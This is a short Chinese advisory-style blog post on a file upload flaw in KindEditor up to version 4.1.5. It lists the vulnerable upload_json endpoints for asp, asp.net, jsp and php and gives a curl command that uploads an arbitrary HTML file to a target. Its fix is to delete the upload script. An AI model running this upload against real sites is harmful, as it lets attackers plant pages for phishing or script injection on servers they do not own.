zoukankan      html  css  js  c++  java
  • kindeditor<=4.1.5 文件上传漏洞利用

    kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use

      

      漏洞存影响版本:小于等于4.1.5的kindeditor 编辑器

      漏洞影响:上传任意. txt 和. html 文件

      漏洞存在动态脚本语言: php/asp/jsp/asp.net

      漏洞存在的证明文件:upload_json.*  具体路径如下:

      /kindeditor/asp/upload_json.asp

      /kindeditor/asp.net/upload_json.ashx

      /kindeditor/jsp/upload_json.jsp

      /kindeditor/php/upload_json.php

    利用方式:

    curl -F "imgFile=@1.html" http://url/kindeditor/asp/upload_json.asp?dir=file

    1.html为想要上传的文件

     

    在返回中得到上传后的路径,然后访问

     修复

    删除upload_json.asp即可。

  • 相关阅读:
    5.9上午
    5.4下午
    5.4上午
    5.2上午
    4.19下午
    4.18上午
    4.17下午
    4.17上午
    4.12下午
    4.13下午
  • 原文地址:https://www.cnblogs.com/iAmSoScArEd/p/10575936.html
Copyright © 2011-2022 走看看